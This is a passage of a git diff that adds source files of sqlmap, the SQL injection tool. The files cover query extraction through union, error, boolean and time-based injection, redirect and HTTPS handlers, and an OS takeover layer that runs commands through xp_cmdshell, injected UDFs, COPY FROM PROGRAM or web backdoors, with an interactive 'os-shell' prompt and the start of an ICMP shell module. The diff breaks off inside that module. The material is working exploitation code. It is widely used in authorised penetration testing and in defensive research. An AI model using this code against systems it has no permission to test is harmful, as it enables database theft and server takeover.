NOTE: we assume that only queries that get data from a table + # can return multiple entries + if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_DUMMY_TABLE) or (Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and not expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]))) and not re.search(SQL_SCALAR_REGEX, expression, re.I) and hasattr(queries[Backend.getIdentifiedDbms()].limitregexp, "query"): + expression, limitCond, topLimit, startLimit, stopLimit = agent.limitCondition(expression) + + if limitCond: + test = True + + if stopLimit is None or stopLimit <= 1: + if Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().endswith(FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]): + test = False + + if test: + # Count the number of SQL query entries output + countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0] + countedExpression = expression.replace(expressionFields, countFirstField, 1) + + if " ORDER BY " in countedExpression.upper(): + _ = countedExpression.upper().rindex(" ORDER BY ") + countedExpression = countedExpression[:_] + + if not stopLimit: + count = _goInference(payload, countedExpression, charsetType=CHARSET_TYPE.DIGITS, firstChar=firstChar, lastChar=lastChar) + + if isNumPosStrValue(count): + count = int(count) + + if batch or count == 1: + stopLimit = count + else: + message = "the SQL query provided can return " + message += "%d entries. How many " % count + message += "entries do you want to retrieve?\n" + message += "[a] All (default)\n[#] Specific number\n" + message += "[q] Quit" + choice = readInput(message, default='A').upper() + + if choice == 'A': + stopLimit = count + + elif choice == 'Q': + raise SqlmapUserQuitException + + elif isDigit(choice) and int(choice) > 0 and int(choice) <= count: + stopLimit = int(choice) + + infoMsg = "sqlmap is now going to retrieve the " + infoMsg += "first %d query output entries" % stopLimit + logger.info(infoMsg) + + elif choice in ('#', 'S'): + message = "how many? " + stopLimit = readInput(message, default="10") + + if not isDigit(stopLimit): + errMsg = "invalid choice" + logger.error(errMsg) + + return None + + else: + stopLimit = int(stopLimit) + + else: + errMsg = "invalid choice" + logger.error(errMsg) + + return None + + elif count and not isDigit(count): + warnMsg = "it was not possible to count the number " + warnMsg += "of entries for the SQL query provided. " + warnMsg += "sqlmap will assume that it returns only " + warnMsg += "one entry" + logger.warning(warnMsg) + + stopLimit = 1 + + elif not isNumPosStrValue(count): + if not count: + warnMsg = "the SQL query provided does not " + warnMsg += "return any output" + logger.warning(warnMsg) + + return None + + elif (not stopLimit or stopLimit == 0): + return None + + try: + try: + for num in xrange(startLimit or 0, stopLimit or 0): + output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) + outputs.append(output) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) + + except KeyboardInterrupt: + print() + warnMsg = "user aborted during dumping phase" + logger.warning(warnMsg) + + return outputs + + elif Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in expression.upper(): + expression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()] + + outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) + + return ", ".join(output or "" for output in outputs) if not isNoneValue(outputs) else None + +def _goBooleanProxy(expression): + """ + Retrieve the output of a boolean based SQL query + """ + + initTechnique(getTechnique()) + + if conf.dnsDomain: + query = agent.prefixQuery(getTechniqueData().vector) + query = agent.suffixQuery(query) + payload = agent.payload(newValue=query) + output = _goDns(payload, expression) + + if output is not None: + return output + + vector = getTechniqueData().vector + vector = vector.replace(INFERENCE_MARKER, expression) + query = agent.prefixQuery(vector) + query = agent.suffixQuery(query) + payload = agent.payload(newValue=query) + + timeBasedCompare = getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) + + output = hashDBRetrieve(expression, checkConf=True) + + if output is None: + output = Request.queryPage(payload, timeBasedCompare=timeBasedCompare, raise404=False) + + if output is not None: + hashDBWrite(expression, output) + + return output + +def _goUnion(expression, unpack=True, dump=False): + """ + Retrieve the output of a SQL query taking advantage of an union SQL + injection vulnerability on the affected parameter. + """ + + output = unionUse(expression, unpack=unpack, dump=dump) + + if isinstance(output, six.string_types): + output = parseUnionPage(output) + + return output + +@lockedmethod +@stackedmethod +def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True): + """ + Called each time sqlmap inject a SQL query on the SQL injection + affected parameter. + """ + + if conf.hexConvert and expected != EXPECTED.BOOL and Backend.getIdentifiedDbms(): + if not hasattr(queries[Backend.getIdentifiedDbms()], "hex"): + warnMsg = "switch '--hex' is currently not supported on DBMS %s" % Backend.getIdentifiedDbms() + singleTimeWarnMessage(warnMsg) + conf.hexConvert = False + else: + charsetType = CHARSET_TYPE.HEXADECIMAL + + kb.safeCharEncode = safeCharEncode + kb.resumeValues = resumeValue + + for keyword in GET_VALUE_UPPERCASE_KEYWORDS: + expression = re.sub(r"(?i)(\A|\(|\)|\s)%s(\Z|\(|\)|\s)" % keyword, r"\g<1>%s\g<2>" % keyword, expression) + + if suppressOutput is not None: + pushValue(getCurrentThreadData().disableStdOut) + getCurrentThreadData().disableStdOut = suppressOutput + + try: + pushValue(conf.db) + pushValue(conf.tbl) + + if expected == EXPECTED.BOOL: + forgeCaseExpression = booleanExpression = expression + + if expression.startswith("SELECT "): + booleanExpression = "(%s)=%s" % (booleanExpression, "'1'" if "'1'" in booleanExpression else "1") + else: + forgeCaseExpression = agent.forgeCaseStatement(expression) + + if conf.direct: + value = direct(forgeCaseExpression if expected == EXPECTED.BOOL else expression) + + elif any(isTechniqueAvailable(_) for _ in getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True)): + query = cleanQuery(expression) + query = expandAsteriskForColumns(query) + value = None + found = False + count = 0 + + if query and not re.search(r"COUNT.*FROM.*\(.*DISTINCT", query, re.I): + query = query.replace("DISTINCT ", "") + + if not conf.forceDns: + if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): + setTechnique(PAYLOAD.TECHNIQUE.UNION) + kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8] + fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion + + if expected == EXPECTED.BOOL: + # Note: some DBMSes (e.g. Altibase) don't support implicit conversion of boolean check result during concatenation with prefix and suffix (e.g. 'qjjvq'||(1=1)||'qbbbq') + + if not any(_ in forgeCaseExpression for _ in ("SELECT", "CASE")): + forgeCaseExpression = "(CASE WHEN (%s) THEN '1' ELSE '0' END)" % forgeCaseExpression + + try: + value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) + except SqlmapConnectionException: + if not fallback: + raise + + count += 1 + found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE + + if not found and fallback: + warnMsg = "something went wrong with full UNION " + warnMsg += "technique (could be because of " + warnMsg += "limitation on retrieved number of entries)" + if " FROM " in query.upper(): + warnMsg += ". Falling back to partial UNION technique" + singleTimeWarnMessage(warnMsg) + + try: + pushValue(kb.forcePartialUnion) + kb.forcePartialUnion = True + value = _goUnion(query, unpack, dump) + found = (value is not None) or (value is None and expectingNone) + finally: + kb.forcePartialUnion = popValue() + else: + singleTimeWarnMessage(warnMsg) + + if error and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) and not found: + setTechnique(PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY) + value = errorUse(forgeCaseExpression if expected == EXPECTED.BOOL else query, dump) + count += 1 + found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE + + if found and conf.dnsDomain: + _ = "".join(filterNone(key if isTechniqueAvailable(value) else None for key, value in {'E': PAYLOAD.TECHNIQUE.ERROR, 'Q': PAYLOAD.TECHNIQUE.QUERY, 'U': PAYLOAD.TECHNIQUE.UNION}.items())) + warnMsg = "option '--dns-domain' will be ignored " + warnMsg += "as faster techniques are usable " + warnMsg += "(%s) " % _ + singleTimeWarnMessage(warnMsg) + + if blind and isTechniqueAvailable(PAYLOAD.TECHNIQUE.BOOLEAN) and not found: + setTechnique(PAYLOAD.TECHNIQUE.BOOLEAN) + + if expected == EXPECTED.BOOL: + value = _goBooleanProxy(booleanExpression) + else: + value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) + + count += 1 + found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE + + if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found: + match = re.search(r"\bFROM\b ([^ ]+).+ORDER BY ([^ ]+)", expression) + kb.responseTimeMode = "%s|%s" % (match.group(1), match.group(2)) if match else None + + if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME): + setTechnique(PAYLOAD.TECHNIQUE.TIME) + else: + setTechnique(PAYLOAD.TECHNIQUE.STACKED) + + if expected == EXPECTED.BOOL: + value = _goBooleanProxy(booleanExpression) + else: + value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) + else: + errMsg = "none of the injection types identified can be " + errMsg += "leveraged to retrieve queries output" + raise SqlmapNotVulnerableException(errMsg) + + finally: + kb.resumeValues = True + kb.responseTimeMode = None + + conf.tbl = popValue() + conf.db = popValue() + + if suppressOutput is not None: + getCurrentThreadData().disableStdOut = popValue() + + kb.safeCharEncode = False + + if not any((kb.testMode, conf.dummy, conf.offline, conf.noCast, conf.hexConvert)) and value is None and Backend.getDbms() and conf.dbmsHandler and kb.fingerprinted: + if conf.abortOnEmpty: + errMsg = "aborting due to empty data retrieval" + logger.critical(errMsg) + raise SystemExit + else: + warnMsg = "in case of continuous data retrieval problems you are advised to try " + warnMsg += "a switch '--no-cast' " + warnMsg += "or switch '--hex'" if hasattr(queries[Backend.getIdentifiedDbms()], "hex") else "" + singleTimeWarnMessage(warnMsg) + + # Dirty patch (MSSQL --binary-fields with 0x31003200...) + if Backend.isDbms(DBMS.MSSQL) and conf.binaryFields: + def _(value): + if isinstance(value, six.text_type): + if value.startswith(u"0x"): + value = value[2:] + if value and len(value) % 4 == 0: + candidate = "" + for i in xrange(len(value)): + if i % 4 < 2: + candidate += value[i] + elif value[i] != '0': + candidate = None + break + if candidate: + value = candidate + return value + + value = applyFunctionRecursively(value, _) + + # Dirty patch (safe-encoded unicode characters) + if isinstance(value, six.text_type) and "\\x" in value: + try: + candidate = eval(repr(value).replace("\\\\x", "\\x").replace("u'", "'", 1)).decode(conf.encoding or UNICODE_ENCODING) + if "\\x" not in candidate: + value = candidate + except: + pass + + return extractExpectedValue(value, expected) + +def goStacked(expression, silent=False): + if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data: + setTechnique(PAYLOAD.TECHNIQUE.STACKED) + else: + for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True): + _ = getTechniqueData(technique) + if _ and "stacked" in _["title"].lower(): + setTechnique(technique) + break + + expression = cleanQuery(expression) + + if conf.direct: + return direct(expression) + + query = agent.prefixQuery(";%s" % expression) + query = agent.suffixQuery(query) + payload = agent.payload(newValue=query) + Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare="SELECT" in (payload or "").upper()) + +def checkBooleanExpression(expression, expectingNone=True): + return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone) diff --git a/src/sqlmap-master/lib/request/methodrequest.py b/src/sqlmap-master/lib/request/methodrequest.py new file mode 100644 index 0000000..f1b97b4 --- /dev/null +++ b/src/sqlmap-master/lib/request/methodrequest.py @@ -0,0 +1,20 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getText +from thirdparty.six.moves import urllib as _urllib + +class MethodRequest(_urllib.request.Request): + """ + Used to create HEAD/PUT/DELETE/... requests with urllib + """ + + def set_method(self, method): + self.method = getText(method.upper()) # Dirty hack for Python3 (may it rot in hell!) + + def get_method(self): + return getattr(self, 'method', _urllib.request.Request.get_method(self)) diff --git a/src/sqlmap-master/lib/request/pkihandler.py b/src/sqlmap-master/lib/request/pkihandler.py new file mode 100644 index 0000000..712e8aa --- /dev/null +++ b/src/sqlmap-master/lib/request/pkihandler.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import conf +from lib.core.common import getSafeExString +from lib.core.exception import SqlmapConnectionException +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib + +class HTTPSPKIAuthHandler(_urllib.request.HTTPSHandler): + def __init__(self, auth_file): + _urllib.request.HTTPSHandler.__init__(self) + self.auth_file = auth_file + + def https_open(self, req): + return self.do_open(self.getConnection, req) + + def getConnection(self, host, timeout=None): + try: + # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain + return _http_client.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout) + except IOError as ex: + errMsg = "error occurred while using key " + errMsg += "file '%s' ('%s')" % (self.auth_file, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) diff --git a/src/sqlmap-master/lib/request/rangehandler.py b/src/sqlmap-master/lib/request/rangehandler.py new file mode 100644 index 0000000..eebebc1 --- /dev/null +++ b/src/sqlmap-master/lib/request/rangehandler.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapConnectionException +from thirdparty.six.moves import urllib as _urllib + +class HTTPRangeHandler(_urllib.request.BaseHandler): + """ + Handler that enables HTTP Range headers. + + Reference: http://stackoverflow.com/questions/1971240/python-seek-on-remote-file + """ + + def http_error_206(self, req, fp, code, msg, hdrs): + # 206 Partial Content Response + r = _urllib.response.addinfourl(fp, hdrs, req.get_full_url()) + r.code = code + r.msg = msg + return r + + def http_error_416(self, req, fp, code, msg, hdrs): + # HTTP's Range Not Satisfiable error + errMsg = "there was a problem while connecting " + errMsg += "target ('406 - Range Not Satisfiable')" + raise SqlmapConnectionException(errMsg) diff --git a/src/sqlmap-master/lib/request/redirecthandler.py b/src/sqlmap-master/lib/request/redirecthandler.py new file mode 100644 index 0000000..726106b --- /dev/null +++ b/src/sqlmap-master/lib/request/redirecthandler.py @@ -0,0 +1,203 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import io +import re +import time +import types + +from lib.core.common import getHostHeader +from lib.core.common import getSafeExString +from lib.core.common import logHTTPTraffic +from lib.core.common import readInput +from lib.core.convert import getBytes +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import CUSTOM_LOGGING +from lib.core.enums import HTTP_HEADER +from lib.core.enums import HTTPMETHOD +from lib.core.enums import REDIRECTION +from lib.core.exception import SqlmapConnectionException +from lib.core.settings import DEFAULT_COOKIE_DELIMITER +from lib.core.settings import MAX_CONNECTION_READ_SIZE +from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE +from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS +from lib.core.settings import MAX_TOTAL_REDIRECTIONS +from lib.core.threads import getCurrentThreadData +from lib.request.basic import decodePage +from lib.request.basic import parseResponse +from thirdparty import six +from thirdparty.six.moves import urllib as _urllib + +class SmartRedirectHandler(_urllib.request.HTTPRedirectHandler): + def _get_header_redirect(self, headers): + retVal = None + + if headers: + if HTTP_HEADER.LOCATION in headers: + retVal = headers[HTTP_HEADER.LOCATION] + elif HTTP_HEADER.URI in headers: + retVal = headers[HTTP_HEADER.URI] + + return retVal + + def _ask_redirect_choice(self, redcode, redurl, method): + with kb.locks.redirect: + if kb.choices.redirect is None: + msg = "got a %d redirect to " % redcode + msg += "'%s'. Do you want to follow? [Y/n] " % redurl + + kb.choices.redirect = REDIRECTION.YES if readInput(msg, default='Y', boolean=True) else REDIRECTION.NO + + if kb.choices.redirect == REDIRECTION.YES and method == HTTPMETHOD.POST and kb.resendPostOnRedirect is None: + msg = "redirect is a result of a " + msg += "POST request. Do you want to " + msg += "resend original POST data to a new " + msg += "location? [%s] " % ("Y/n" if not kb.originalPage else "y/N") + + kb.resendPostOnRedirect = readInput(msg, default=('Y' if not kb.originalPage else 'N'), boolean=True) + + if kb.resendPostOnRedirect: + self.redirect_request = self._redirect_request + + def _redirect_request(self, req, fp, code, msg, headers, newurl): + return _urllib.request.Request(newurl.replace(' ', '%20'), data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host() if hasattr(req, "get_origin_req_host") else req.origin_req_host) + + def http_error_302(self, req, fp, code, msg, headers): + start = time.time() + content = None + forceRedirect = False + redurl = self._get_header_redirect(headers) if not conf.ignoreRedirects else None + + try: + content = fp.read(MAX_CONNECTION_TOTAL_SIZE) + except: # e.g. IncompleteRead + content = b"" + finally: + if content: + try: # try to write it back to the read buffer so we could reuse it in further steps + fp.fp._rbuf.truncate(0) + fp.fp._rbuf.write(content) + except: + pass + + content = decodePage(content, headers.get(HTTP_HEADER.CONTENT_ENCODING), headers.get(HTTP_HEADER.CONTENT_TYPE)) + + threadData = getCurrentThreadData() + threadData.lastRedirectMsg = (threadData.lastRequestUID, content) + + redirectMsg = "HTTP redirect " + redirectMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, getUnicode(msg)) + + if headers: + logHeaders = "\r\n".join("%s: %s" % (getUnicode(key.capitalize() if hasattr(key, "capitalize") else key), getUnicode(value)) for (key, value) in headers.items()) + else: + logHeaders = "" + + redirectMsg += logHeaders + if content: + redirectMsg += "\r\n\r\n%s" % getUnicode(content[:MAX_CONNECTION_READ_SIZE]) + + logHTTPTraffic(threadData.lastRequestMsg, redirectMsg, start, time.time()) + logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg) + + if redurl: + try: + if not _urllib.parse.urlsplit(redurl).netloc: + redurl = _urllib.parse.urljoin(req.get_full_url(), redurl) + + self._infinite_loop_check(req) + if conf.scope: + if not re.search(conf.scope, redurl, re.I): + redurl = None + else: + forceRedirect = True + else: + self._ask_redirect_choice(code, redurl, req.get_method()) + except ValueError: + redurl = None + result = fp + + if redurl and (kb.choices.redirect == REDIRECTION.YES or forceRedirect): + parseResponse(content, headers) + + req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl) + if headers and HTTP_HEADER.SET_COOKIE in headers: + cookies = dict() + delimiter = conf.cookieDel or DEFAULT_COOKIE_DELIMITER + last = None + + for part in getUnicode(req.headers.get(HTTP_HEADER.COOKIE, "")).split(delimiter) + ([headers[HTTP_HEADER.SET_COOKIE]] if HTTP_HEADER.SET_COOKIE in headers else []): + if '=' in part: + part = part.strip() + key, value = part.split('=', 1) + cookies[key] = value + last = key + elif last: + cookies[last] += "%s%s" % (delimiter, part) + + req.headers[HTTP_HEADER.COOKIE] = delimiter.join("%s=%s" % (key, cookies[key]) for key in cookies) + + try: + result = _urllib.request.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers) + except _urllib.error.HTTPError as ex: + result = ex + + # Dirty hack for https://github.com/sqlmapproject/sqlmap/issues/4046 + try: + hasattr(result, "read") + except KeyError: + class _(object): + pass + result = _() + + # Dirty hack for http://bugs.python.org/issue15701 + try: + result.info() + except AttributeError: + def _(self): + return getattr(self, "hdrs", {}) + + result.info = types.MethodType(_, result) + + if not hasattr(result, "read"): + def _(self, length=None): + try: + retVal = getSafeExString(ex) # Note: pyflakes mistakenly marks 'ex' as undefined (NOTE: tested in both Python2 and Python3) + except: + retVal = "" + return getBytes(retVal) + + result.read = types.MethodType(_, result) + + if not getattr(result, "url", None): + result.url = redurl + + if not getattr(result, "code", None): + result.code = 999 + except: + redurl = None + result = fp + fp.read = io.BytesIO(b"").read + else: + result = fp + + threadData.lastRedirectURL = (threadData.lastRequestUID, redurl) + + result.redcode = code + result.redurl = getUnicode(redurl) if six.PY3 else redurl + return result + + http_error_301 = http_error_303 = http_error_307 = http_error_302 + + def _infinite_loop_check(self, req): + if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= MAX_SINGLE_URL_REDIRECTIONS or len(req.redirect_dict) >= MAX_TOTAL_REDIRECTIONS): + errMsg = "infinite redirect loop detected (%s). " % ", ".join(item for item in req.redirect_dict.keys()) + errMsg += "Please check all provided parameters and/or provide missing ones" + raise SqlmapConnectionException(errMsg) diff --git a/src/sqlmap-master/lib/request/templates.py b/src/sqlmap-master/lib/request/templates.py new file mode 100644 index 0000000..05fecc2 --- /dev/null +++ b/src/sqlmap-master/lib/request/templates.py @@ -0,0 +1,21 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import kb +from lib.request.connect import Connect as Request + +def getPageTemplate(payload, place): + retVal = (kb.originalPage, kb.errorIsNone) + + if payload and place: + if (payload, place) not in kb.pageTemplates: + page, _, _ = Request.queryPage(payload, place, content=True, raise404=False) + kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None) + + retVal = kb.pageTemplates[(payload, place)] + + return retVal diff --git a/src/sqlmap-master/lib/takeover/__init__.py b/src/sqlmap-master/lib/takeover/__init__.py new file mode 100644 index 0000000..7777bde --- /dev/null +++ b/src/sqlmap-master/lib/takeover/__init__.py @@ -0,0 +1,8 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +pass diff --git a/src/sqlmap-master/lib/takeover/abstraction.py b/src/sqlmap-master/lib/takeover/abstraction.py new file mode 100644 index 0000000..309b5fc --- /dev/null +++ b/src/sqlmap-master/lib/takeover/abstraction.py @@ -0,0 +1,231 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +import sys + +from lib.core.common import Backend +from lib.core.common import dataToStdout +from lib.core.common import getSQLSnippet +from lib.core.common import isStackingAvailable +from lib.core.common import readInput +from lib.core.convert import getUnicode +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import AUTOCOMPLETE_TYPE +from lib.core.enums import DBMS +from lib.core.enums import OS +from lib.core.exception import SqlmapFilePathException +from lib.core.exception import SqlmapUnsupportedFeatureException +from lib.core.shell import autoCompletion +from lib.request import inject +from lib.takeover.udf import UDF +from lib.takeover.web import Web +from lib.takeover.xp_cmdshell import XP_cmdshell +from lib.utils.safe2bin import safechardecode +from thirdparty.six.moves import input as _input + +class Abstraction(Web, UDF, XP_cmdshell): + """ + This class defines an abstraction layer for OS takeover functionalities + to UDF / XP_cmdshell objects + """ + + def __init__(self): + self.envInitialized = False + self.alwaysRetrieveCmdOutput = False + + UDF.__init__(self) + Web.__init__(self) + XP_cmdshell.__init__(self) + + def execCmd(self, cmd, silent=False): + if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): + self.copyExecCmd(cmd) + + elif self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail): + self.webBackdoorRunCmd(cmd) + + elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + self.udfExecCmd(cmd, silent=silent) + + elif Backend.isDbms(DBMS.MSSQL): + self.xpCmdshellExecCmd(cmd, silent=silent) + + else: + errMsg = "Feature not yet implemented for the back-end DBMS" + raise SqlmapUnsupportedFeatureException(errMsg) + + def evalCmd(self, cmd, first=None, last=None): + retVal = None + + if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): + retVal = self.copyExecCmd(cmd) + + elif self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail): + retVal = self.webBackdoorRunCmd(cmd) + + elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + retVal = self.udfEvalCmd(cmd, first, last) + + elif Backend.isDbms(DBMS.MSSQL): + retVal = self.xpCmdshellEvalCmd(cmd, first, last) + + else: + errMsg = "Feature not yet implemented for the back-end DBMS" + raise SqlmapUnsupportedFeatureException(errMsg) + + return safechardecode(retVal) + + def runCmd(self, cmd): + choice = None + + if not self.alwaysRetrieveCmdOutput: + message = "do you want to retrieve the command standard " + message += "output? [Y/n/a] " + choice = readInput(message, default='Y').upper() + + if choice == 'A': + self.alwaysRetrieveCmdOutput = True + + if choice == 'Y' or self.alwaysRetrieveCmdOutput: + output = self.evalCmd(cmd) + + if output: + conf.dumper.string("command standard output", output) + else: + dataToStdout("No output\n") + else: + self.execCmd(cmd) + + def shell(self): + if self.webBackdoorUrl and (not isStackingAvailable() or kb.udfFail): + infoMsg = "calling OS shell. To quit type " + infoMsg += "'x' or 'q' and press ENTER" + logger.info(infoMsg) + + else: + if Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): + infoMsg = "going to use 'COPY ... FROM PROGRAM ...' " + infoMsg += "command execution" + logger.info(infoMsg) + + elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + infoMsg = "going to use injected user-defined functions " + infoMsg += "'sys_eval' and 'sys_exec' for operating system " + infoMsg += "command execution" + logger.info(infoMsg) + + elif Backend.isDbms(DBMS.MSSQL): + infoMsg = "going to use extended procedure 'xp_cmdshell' for " + infoMsg += "operating system command execution" + logger.info(infoMsg) + + else: + errMsg = "feature not yet implemented for the back-end DBMS" + raise SqlmapUnsupportedFeatureException(errMsg) + + infoMsg = "calling %s OS shell. To quit type " % (Backend.getOs() or "Windows") + infoMsg += "'x' or 'q' and press ENTER" + logger.info(infoMsg) + + autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX) + + while True: + command = None + + try: + command = _input("os-shell> ") + command = getUnicode(command, encoding=sys.stdin.encoding) + except KeyboardInterrupt: + print() + errMsg = "user aborted" + logger.error(errMsg) + except EOFError: + print() + errMsg = "exit" + logger.error(errMsg) + break + + if not command: + continue + + if command.lower() in ("x", "q", "exit", "quit"): + break + + self.runCmd(command) + + def _initRunAs(self): + if not conf.dbmsCred: + return + + if not conf.direct and not isStackingAvailable(): + errMsg = "stacked queries are not supported hence sqlmap cannot " + errMsg += "execute statements as another user. The execution " + errMsg += "will continue and the DBMS credentials provided " + errMsg += "will simply be ignored" + logger.error(errMsg) + + return + + if Backend.isDbms(DBMS.MSSQL): + msg = "on Microsoft SQL Server 2005 and 2008, OPENROWSET function " + msg += "is disabled by default. This function is needed to execute " + msg += "statements as another DBMS user since you provided the " + msg += "option '--dbms-creds'. If you are DBA, you can enable it. " + msg += "Do you want to enable it? [Y/n] " + + if readInput(msg, default='Y', boolean=True): + expression = getSQLSnippet(DBMS.MSSQL, "configure_openrowset", ENABLE="1") + inject.goStacked(expression) + + # TODO: add support for PostgreSQL + # elif Backend.isDbms(DBMS.PGSQL): + # expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1") + # inject.goStacked(expression) + + def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False): + self._initRunAs() + + if self.envInitialized and not forceInit: + return + + if web: + self.webInit() + else: + self.checkDbmsOs(detailed) + + if mandatory and not self.isDba(): + warnMsg = "functionality requested probably does not work because " + warnMsg += "the current session user is not a database administrator" + + if not conf.dbmsCred and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): + warnMsg += ". You can try to use option '--dbms-cred' " + warnMsg += "to execute statements as a DBA user if you " + warnMsg += "were able to extract and crack a DBA " + warnMsg += "password by any mean" + + logger.warning(warnMsg) + + if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and self.checkCopyExec(): + success = True + elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + success = self.udfInjectSys() + + if success is not True: + msg = "unable to mount the operating system takeover" + raise SqlmapFilePathException(msg) + elif Backend.isDbms(DBMS.MSSQL): + if mandatory: + self.xpCmdshellInit() + else: + errMsg = "feature not yet implemented for the back-end DBMS" + raise SqlmapUnsupportedFeatureException(errMsg) + + self.envInitialized = True diff --git a/src/sqlmap-master/lib/takeover/icmpsh.py b/src/sqlmap-master/lib/takeover/icmpsh.py new file mode 100644 index 0000000..14e54fb --- /dev/null +++ b/src/sqlmap-master/lib/takeover/icmpsh.py @@ -0,0 +1,140 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import os +import re +import socket +import time + +from extra.icmpsh.icmpsh_m import main as icmpshmaster +from lib.core.common import getLocalIP +from lib.core.common import getRemoteIP +from lib.core.common import normalizePath +from lib.core.common import ntToPosixSlashes +from lib.core.common import randomStr +from lib.core.common import readInput +from lib.core.data import conf +from lib.core.data import logger +from lib.core.data import paths +from lib.core.exception import SqlmapDataException + +class ICMPsh(object): + """ + This class defines methods to call icmpsh for plugins. + """ + + def 